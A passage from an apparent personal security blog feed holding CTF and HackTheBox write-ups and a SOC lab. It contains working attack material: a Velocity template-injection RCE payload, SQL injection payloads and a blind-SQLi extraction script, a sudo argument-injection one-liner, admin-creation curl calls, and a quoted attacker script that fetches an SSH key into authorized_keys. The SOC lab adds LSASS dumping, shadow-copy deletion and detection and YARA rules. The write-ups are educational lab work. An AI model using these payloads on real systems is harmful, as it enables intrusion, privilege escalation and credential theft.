#set($bufferedReaderClass=$stringClass.forName(\u0026#34;java.io.BufferedReader\u0026#34;)) #set($collectorsClass=$stringClass.forName(\u0026#34;java.util.stream.Collectors\u0026#34;)) #set($systemClass=$stringClass.forName(\u0026#34;java.lang.System\u0026#34;)) #set($stringBuilderConstructor=$stringBuilderClass.getConstructor()) #set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass)) #set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass)) #set($runtime=$stringClass.forName(\u0026#34;java.lang.Runtime\u0026#34;).getRuntime()) #set($process=$runtime.exec(\u0026#34;cat ../flag2023911480.txt\u0026#34;)) #set($null=$process.waitFor() ) #set($inputStream=$process.getInputStream()) #set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream)) #set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader)) #set($stringBuilder=$stringBuilderConstructor.newInstance()) #set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator()))) $output Just use the payload in the browser and capture the request in burp.\nflag : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}\nLocktalk rating: medium\nThis is where things got interesting.\nHere you are given a webapplication with an api blueprint.\nThe api had three routes:\n1 2 3 4 5 /flag protected by middleware /chat/\u0026lt;int:chat_id\u0026gt; protected by middleware /get_ticket open but blocked by ha proxy A quick look at the proxy configuration\n1 2 3 4 5 frontend haproxy bind 0.0.0.0:1337 default_backend backend http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } So we had to find a way to bypass this. I used a lot of time on this part. Until i found this \u0026raquo; here\nTo make your search easier you had to find the ha proxy version from the dockerfile : PS i had forgotten do thsi , it could have made my work easier.\n1 2 3 4 5 6 WORKDIR /tmp RUN wget https://www.haproxy.org/download/2.8/src/haproxy-2.8.1.tar.gz \u0026amp;\u0026amp; \\ tar zxvf haproxy-*.tar.gz \u0026amp;\u0026amp; cd haproxy-* \u0026amp;\u0026amp; \\ make TARGET=linux-musl \u0026amp;\u0026amp; \\ make install RUN rm -rf * From the article if we make a request to /api/v1/get_ticket we get denied but if we make request to /api/v1/get_ticket# we bypass the acl.\nFrom here i gotr the jwt token. I tries common methos of exploiting jwt but none of them worked. UNtil i searched for a vulnerability in python_jwt==3.3.3 from the requirements.txt\nI found this vulnerability that enables us to bypass the jwt verification \u0026raquo; here and for the exploit \u0026raquo; here\nWe change our role to administrator and then read the flag\nflag: HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}\nTestimonial Here we are given a webapplication that accepts parameters customer and testimonial.\nIt is a go webapplication witha grpc endpoint. I saw some people asking on the discord why there were two ip addresses. One if for the main webapp and one was for grpc. Read more about grpc \u0026raquo; here\nIve encountered with grpc before. So the tools we will need are grpcurl and grpcui. In this context grpcui will not work.\n1 grpcurl -plaintext -import-path ./ -proto ptypes.proto -d \u0026#39;{\u0026#34;customer\u0026#34;: \u0026#34;examplecusomer\u0026#34;, \u0026#34;testimonial\u0026#34;: \u0026#34;exampletestimonial\u0026#34;}\u0026#39; 94.237.59.119:45387 RickyService.SubmitTestimonial Above is the format for grpcurl. Breakdown:\nptypes.proto file is in the pb folder . This is used to enable grpcurl to interact with the server since service enumaration was disables . This is what caused grpcui not to work.\nThe service and method name can be found in the source code.\nUsing this will also enable you to bypass the filter that was placed in the code\n1 2 3 for _, char := range []string{\u0026#34;/\u0026#34;, \u0026#34;\\\\\u0026#34;, \u0026#34;:\u0026#34;, \u0026#34;*\u0026#34;, \u0026#34;?\u0026#34;, \u0026#34;\\\u0026#34;\u0026#34;, \u0026#34;\u0026lt;\u0026#34;, \u0026#34;\u0026gt;\u0026#34;, \u0026#34;|\u0026#34;, \u0026#34;.\u0026#34;} { customer = strings.ReplaceAll(customer, char, \u0026#34;\u0026#34;) } NOTE: Beyond this point i did after the ctf , i did not solve this one.\nOfficial writeup \u0026raquo; https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BEasy%5D%20Testimonial\n","date":"2024-03-11T13:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/ca2024.png","permalink":"https://f0rk3b0mb.github.io/p/htb_cyberapocalypse_2024/","title":"HTB_cyberapocalypse_2024"},{"content":"HTB monitored Writeup for HTB monitored box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT Warning: 10.10.11.248 giving up on port because retransmission cap hit (6). Nmap scan report for monitored.htb (10.10.11.248) Host is up (0.36s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (unsynchronized) | ntp-info: |_ 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 6f3fa7421af94c6500000000 | snmpEngineBoots: 35 |_ snmpEngineTime: 48m05s | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:389 0.0.0.0:0 | TCP 127.0.0.1:25 0.0.0.0:0 |_ UDP 0.0.0.0:68 *:* | snmp-processes: | 1: | | 2: | |_ 3: | snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64 |_ System uptime: 48m5.77s (288577 timeticks) |_snmp-win32-software: 162/udp open snmp net-snmp; net-snmp SNMPv3 server | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 5a44ab2146ff4c6500000000 | snmpEngineBoots: 26 |_ snmpEngineTime: 48m05s 1100/udp open|filtered mctp 1813/udp open|filtered radacct 3130/udp open|filtered squid-ipc 19500/udp open|filtered unknown 22053/udp open|filtered unknown 27444/udp open|filtered Trinoo_Bcast 44190/udp open|filtered unknown 49259/udp open|filtered unknown Service Info: Host: monitored Host script results: |_clock-skew: 10s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds Snmp enumeration\n1 snmpwalk -v1 -c public monitored.htb we get creds for username: svc pass: XjH7VCehowpR1xZB\nMaking a post request to /api/v1/authenticate we get access token that we can use to login\n1 2 https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0 this nagios is vulnerable to sql injection \u0026raquo; see here\n1 sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=40ka0uvgngmjev8i267hq2qt9p\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump Dumping the db enables us to get an admin api key : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nWe can now create our owm user with full privilldeges\n1 curl -XPOST -k \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=test\u0026amp;password=test\u0026amp;name=test\u0026amp;email=test@test.com\u0026amp;auth_level=admin\u0026#34; Uploads a reverse shell by creating a command and checking it\nuser.txt 5428c0b228e51f2428525f3faa3fcca2\nTo escalate privilldges we modify the setuid binary npcd\nroot.txt 9893d1d8c72bc11111a49fcb508ac07a\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_monitored/","title":"Htb_monitored"},{"content":"HTB surveillance Writeup for htb surveillnace box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT Nmap scan report for 10.10.11.245 Host is up (0.30s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds A cms is running in port 80 , craft cms\nIt is vulnerable to rce CVE-2023-41892\nThere are 2 :\nmatthew zoneminder Further enumartion we get a backup file surveillance\u0026ndash;2023-10-17-202801\u0026ndash;v4.4.14.sql.zip. It has a sql backup of the database , here we get creds for the user matthew.\nuser.txt 260ecc03cedb8e78d80a6658b5b22eac\nWe also get the creda for zoneminder in the ZoneMinder config files password : ZoneMinderPassword2023\nZoneminder is a service running on port 8080, So we tunnel using ssh to access it.\nIt is vulnerable to rce CVE-2023-26035\nTo escalate priviledges and read root flag\n1 sudo /usr/bin/zmupdate.pl -v 1.19.0 -u \u0026#34;;cat /root/root.txt;\u0026#34; root.txt 13630834b0c9c6f122557097788d8e25\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_surveillance/","title":"Htb_surveillance"},{"content":"SOC Lab Setup Introduction This is my documentation of a lab setup for a SOC (Security operation center) environment. I decided to pursue this project with the aim of learning about endpoint detection and response. SOC analysis is more about blue teaming and detecting threats in an environment.\nAs is did this i followed steps from this blog post \u0026raquo; here . Credits!!\nSummary Setup Intrusion Blocking attacks Tuning False Positives Setup Setup of vms(ubuntu server and windows) NOTE: im using a computer with the following specs:\n8gb RAM intel i5 500gb hard disk You might want to allocate different amount of resources for your vms depending on the specs of your hardware. As for me my specs constrained me , my vms were slow esp the windows vm. I allocated 2gb for the windows vm and 1gb for the ubuntu server.\nInstalling of limacharlie sensor LimaCharlie is a very powerful “SecOps Cloud Platform” . Check it out \u0026raquo; here\nC2 (command and control) For the C2 i used sliver-server by bishop fox\n1 Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing I created a C2 payload and dropped it in the windows vm.\nUsing the implant we can access the windows vm from the ubuntu server attack machine.\nBelow is a list of running processes\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 . ├── [0] [System Process] │ └── [4] System │ ├── [1444] Memory Compression │ ├── [72] Registry │ └── [528] smss.exe ├── [632] csrss.exe ├── [732] csrss.exe ├── [776] wininit.exe │ ├── [864] services.exe │ │ ├── [2160] Sysmon64.exe │ │ ├── [3708] svchost.exe │ │ ├── [1348] svchost.exe │ │ ├── [1508] svchost.exe │ │ ├── [1668] svchost.exe │ │ │ └── [5768] audiodg.exe │ │ ├── [2152] vm3dservice.exe │ │ │ └── [2284] vm3dservice.exe │ │ ├── [1128] svchost.exe │ │ │ ├── [648] taskhostw.exe │ │ │ ├── [1960] sihost.exe │ │ │ ├── [2436] CompatTelRunner.exe │ │ │ │ ├── [2488] conhost.exe │ │ │ │ └── [1236] CompatTelRunner.exe │ │ │ ├── [2520] MicrosoftEdgeUpdate.exe │ │ │ └── [3460] taskhostw.exe │ │ ├── [2124] vmtoolsd.exe │ │ ├── [4368] svchost.exe │ │ ├── [3500] SecurityHealthService.exe │ │ ├── [6548] svchost.exe │ │ ├── [1636] svchost.exe │ │ ├── [1772] svchost.exe │ │ ├── [1788] svchost.exe │ │ ├── [3100] SgrmBroker.exe │ │ ├── [1304] svchost.exe │ │ ├── [2168] VGAuthService.exe │ │ ├── [2132] rphcp.exe │ │ ├── [628] svchost.exe │ │ ├── [896] spoolsv.exe │ │ ├── [992] svchost.exe │ │ │ ├── [1284] ShellExperienceHost.exe │ │ │ ├── [1580] RuntimeBroker.exe │ │ │ ├── [3240] BackgroundTransferHost.exe │ │ │ ├── [4376] backgroundTaskHost.exe │ │ │ ├── [5572] RuntimeBroker.exe │ │ │ ├── [740] unsecapp.exe │ │ │ ├── [1156] dllhost.exe │ │ │ ├── [5608] SearchApp.exe │ │ │ ├── [6004] RuntimeBroker.exe │ │ │ ├── [4352] RuntimeBroker.exe │ │ │ ├── [2476] WmiPrvSE.exe │ │ │ ├── [3680] WmiPrvSE.exe │ │ │ ├── [3892] TextInputHost.exe │ │ │ ├── [3932] StartMenuExperienceHost.exe │ │ │ ├── [4488] MoUsoCoreWorker.exe │ │ │ ├── [1256] RuntimeBroker.exe │ │ │ ├── [3552] smartscreen.exe │ │ │ ├── [5064] SearchApp.exe │ │ │ └── [1216] TiWorker.exe │ │ ├── [2984] dllhost.exe │ │ ├── [2092] TrustedInstaller.exe │ │ ├── [2376] svchost.exe │ │ ├── [3912] SearchIndexer.exe │ │ ├── [5652] svchost.exe │ │ ├── [1172] svchost.exe │ │ │ ├── [3152] ctfmon.exe │ │ │ └── [4800] CompatTelRunner.exe │ │ │ └── [2944] conhost.exe │ │ ├── [1520] svchost.exe │ │ ├── [1532] svchost.exe │ │ ├── [1832] msdtc.exe │ │ ├── [736] svchost.exe │ │ ├── [4852] sppsvc.exe │ │ ├── [5172] svchost.exe │ │ ├── [1292] svchost.exe │ │ ├── [1628] svchost.exe │ │ ├── [1640] svchost.exe │ │ └── [2120] svchost.exe │ ├── [876] lsass.exe │ └── [1016] fontdrvhost.exe ├── [784] winlogon.exe │ ├── [1008] fontdrvhost.exe │ └── [1040] dwm.exe ├── [3328] explorer.exe │ ├── [3512] SecurityHealthSystray.exe │ ├── [3880] vmtoolsd.exe │ ├── [4272] OneDrive.exe │ └── [6984] cmd.exe │ ├── [1696] CONTINUED_CARRY.exe │ └── [3612] conhost.exe ├── [6808] setup.exe │ ├── [7032] setup.exe │ └── [3008] MicrosoftEdgeUpdate.exe └── [6952] Microsoft.SharePoint.exe ⚠️ Security Product(s): Sysmon64, Windows Smart Screen Inturn we can observe the malware in the limacharlie telementery. We can detect our maliciuos process apart from the the legitimate processes. we can also view it network connections.\nIntrusion I can steal creds by dumping lsass.exe from the windows box memory to my attack machine\nThis will generate telementery in limacharkie that we can search with \u0026ldquo;SENSITIVE_PROCESS_ACCESS\u0026rdquo;\nWe can create an edr rule to alert once this type of activity occurs\n1 2 3 4 event: SENSITIVE_PROCESS_ACCESS op: ends with path: event/*/TARGET/FILE_PATH value: lsass.exe This rule will detect \u0026ldquo;SENSITIVE_PROCEE_ACCESS\u0026rdquo; with process being \u0026ldquo;lsass.exe\u0026rdquo;\nTo respond we use:\n1 2 - action: report name: LSASS access This will generate a detection report that we can view in the detections menu.\nBlocking attacks Here we are going to craft rules to take action when detections are made\nin thbis i ran thsi command :\n1 vssadmin delete shadows /all Which will delete volume shadow copies. This is just an example of a process that may indicate suspicious activity on a system\nThen we craft an Response rule:\nThis rule will terminate the parent process when it is detected.\n1 2 3 4 5 6 - action: report name: vss_deletion_kill_it - action: task command: - deny_tree - \u0026lt;\u0026lt;routing/parent\u0026gt;\u0026gt; This hung shell is an indication that it worked succesfully\nTuning False Positives Here we craft a false positive detection rule. This is whereby we can prevent alerts when normal system processes are run, thus causing alot of noise.\nI crafted to detect when whoami.exe is run. This is just an example.\n1 2 3 4 5 6 7 8 9 10 11 op: and rules: - op : is path: cat value: Whoami Utility Execution - op: is path: detect/event/FILE_PATH value: C:\\Windows\\system32\\whoami.exe - op: is path: detect/event/COMMAND_LINE value: \u0026#39;\u0026#34;C:\\Windows\\system32\\whoami.exe\u0026#34;\u0026#39; After testing it:\nIt works!!\nIf i run whoami when the rule is enabled i get no alaert, however whn i disable it i get an alert.\nAutomated Yara Scanning 1 2 YARA is a tool primarily used for identifying and classifying malware based on textual or binary patterns. It allows researchers and security professionals to craft rules that describe unique characteristics of specific malware families or malicious behaviors. There are well crafted rules for sliver (our c2 server) on the internet. We will use this \u0026raquo; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ule sliver_github_file_paths_function_names { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver Windows and Linux implants based on paths and function names within the binary\u0026#34; strings: $p1 = \u0026#34;/sliver/\u0026#34; $p2 = \u0026#34;sliverpb.\u0026#34; $fn1 = \u0026#34;RevToSelfReq\u0026#34; $fn2 = \u0026#34;ScreenshotReq\u0026#34; $fn3 = \u0026#34;IfconfigReq\u0026#34; $fn4 = \u0026#34;SideloadReq\u0026#34; $fn5 = \u0026#34;InvokeMigrateReq\u0026#34; $fn6 = \u0026#34;KillSessionReq\u0026#34; $fn7 = \u0026#34;ImpersonateReq\u0026#34; $fn8 = \u0026#34;NamedPipesReq\u0026#34; condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and (all of ($p*) or 3 of ($fn*)) } rule sliver_proxy_isNotFound_retn_cmp_uniq { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on some unique CMPs within the Proxy isNotFound function. False positives may occur\u0026#34; strings: $ = {C644241800C381F9B3B5E9B2} $ = {8B481081F90CAED682} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } rule sliver_nextCCServer_calcs { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on instructions from the nextCCServer function. False positives may occur\u0026#34; strings: $ = {4889D3489948F7F94839CA????48C1E204488B0413488B4C1308} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } We will also need a rule to detect when yara is matched.\n1 2 3 4 5 6 7 8 event: YARA_DETECTION op: and rules: - not: true op: exists path: event/PROCESS/* - op: exists path: event/RULE_NAME From here we can create rules to automatically scan new executables and those in the downloads directory.\nWith this we can uleash the full power of the EDR to scan and detect malicious processes and files\nUntil next time!! HACK THE PLANET\n","date":"2024-02-06T15:57:25+03:00","image":"https://f0rk3b0mb.github.io/cover/soc_lab.jpg","permalink":"https://f0rk3b0mb.github.io/p/soc_analyst_lab/","title":"Soc_analyst_lab"},{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\nREADME This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\nGain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\nUpdate:\nAfter you get the password , there is ana OTP page . The page also has an option to resend otp which requires you to enter an email. If we eneter the email roor@knightctf.com. That we had earlier we can see that it accepts it. Note: I had tries this methos earlier but i used the wrong format.\nSo you can send several email as an array []\n1 2 3 4 { \u0026#34;email\u0026#34;: [\u0026#34;root@knightctf.com\u0026#34;,\u0026#34;attacker@email.com\u0026#34;] } This will send the OTP code to both emails. Using the OTP code we get the flag\nCREDIT: @T3l3sc0p3\nNetworking For the networking challs check out my teammates writeups on them \u0026raquo;\nhere ","date":"2024-01-20T22:14:59+03:00","image":"https://f0rk3b0mb.github.io/cover/knightctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34; or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Writeup of htb sherlock Meerkat rating: easy\nWe believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running? we can filter the meerkat-alerts.json with\u0026hellip;\n1 2 3 4 cat meerkat-alerts.json |jq |grep signature | grep -v python the bmp name is in the signature ans: Bonitasoft\nWe believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out? From the meerkat-alerts.json and from pacap file we can see that there was alot of alerts on python-requests and we can see the requests tested different creds. This is possible Credential Stuffing\nans: Credential Stuffing\nDoes the vulnerability exploited have a CVE assigned - and if so, which one? Here use the same command as question1 , the cve is in the signature\nans: CVE-2022-25237\nWhich string was appended to the API URL path to bypass the authorization filter by the attacker\u0026rsquo;s exploit? in this case i used tshark to analyse the pcap.\n1 2 3 4 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri | grep -i api filter post requests , get the url path and grep for the api endpoints i18ntranslation\nHow many combinations of usernames and passwords were used in the credential stuffing attack? here we filter post requests, the we remove \u0026ldquo;username=install\u0026amp;password=install\u0026amp;_l=en\u0026rdquo; , i also removed \u0026ldquo;/bonita/API/portal/page/;i18ntranslation\u0026rdquo; and \u0026ldquo;/bonita/API/pageUpload;i18ntranslation?action=add\u0026rdquo; which were not login requests then pipe the output to uniq\n1 2 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri -e http.file_data | grep -v \u0026#34;username=install\u0026amp;password=install\u0026amp;_l=en\u0026#34; | grep -v \u0026#34;/bonita/API/portal/page/;i18ntranslation\u0026#34; | grep -v \u0026#34;/bonita/API/pageUpload;i18ntranslation?action=add\u0026#34; | uniq | wc -l ans: 56\nWhich username and password combination was successful? From the query above without uniq , the last combination has a different http.file_data , yoll have to check through wireshark but the ans is \u0026hellip;\nans: seb.broom@forela.co.uk:g0vernm3nt\nIf any, which text sharing site did the attacker utilise? As i was analysing the pcap using this query we can get the full uri. the url is part of parameters\n1 tshark -r meerkat.pcap -T fields -e http.request.full_uri | uniq ans: pastes.io\nPlease provide the filename of the public key used by the attacker to gain persistence on our host. Visiting the url we get a bash script with the following content\u0026hellip; hxxps[://]pastes[.]io/raw/bx5gcr0et8\n1 2 3 #!/bin/bash curl https://pastes.io/raw/hffgra4unv \u0026gt;\u0026gt; /home/ubuntu/.ssh/authorized_keys sudo service ssh restart ans: hffgra4unv\nCan you confirmed the file modified by the attacker to gain persistence? see above\nans: /home/ubuntu/.ssh/authorized_keys\nCan you confirm the MITRE technique ID of this type of persistence mechanism? this technique of using ssh authorized keys has id T1098.004. You can get this by visiting mitre website or googling or use chatgpt idc.\nans: T1098.004\n","date":"2023-12-20T14:43:14+03:00","permalink":"https://f0rk3b0mb.github.io/p/htb-sherlock-meerkat/","title":"Htb Sherlock Meerkat"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\nHow many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 1 2 3 4 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 index=main powershell ans : James.browne PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? 1 2 3 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 1. Analyse the report. What is the name of the agent that has generated the most alerts? agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) 